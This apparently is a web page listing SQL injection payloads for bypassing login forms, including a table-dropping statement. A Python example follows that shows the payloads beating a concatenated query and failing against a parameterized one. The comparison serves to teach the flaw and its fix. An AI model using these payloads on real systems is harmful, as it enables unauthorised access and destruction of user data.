Generic – Bypass Authentication
The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).
| Payload | Description (if any) |
| --- | --- |
| `realusername' OR 1=1--` | Authenticate as a real user without requiring a password. |
| `'OR '' = '` | Allows authentication without a valid username. |
| `admin'--` | Authenticate as user admin without a password. |
| `' union select 1, 'user', 'pass' 1--` | Requires knowledge of column names. |
| `'; drop table users--` | DANGEROUS! This will delete the user database if the table name is 'users'. |
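
Why these inputs authenticate and what stops them, as an added example that is not part of the original page: a login check built by string concatenation beside a parameterized one, run against an in-memory SQLite database, where each table input passes the first check and fails the second. The schema, function names and sample account are assumptions constructed for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-pw')")
    return db

def login_concatenated(db, username, password):
    # Vulnerable form: the input is spliced into the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input produced a statement that does not parse

def login_parameterized(db, username, password):
    # Hardened form: values are bound to placeholders and compared as data.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# (username, password) inputs taken from the table above; "realusername"
# is replaced by the constructed account name "admin".
TABLE_INPUTS = [
    ("admin' OR 1=1--", "x"),
    ("admin'--", "x"),
    ("'OR '' = '", "'OR '' = '"),
]

def compare():
    # Returns (input, concatenated result, parameterized result) per row.
    db = make_db()
    return [(u, login_concatenated(db, u, p), login_parameterized(db, u, p))
            for u, p in TABLE_INPUTS]

if __name__ == "__main__":
    for username, weak, safe in compare():
        print(f"{username!r:22} concatenated={weak} parameterized={safe}")
```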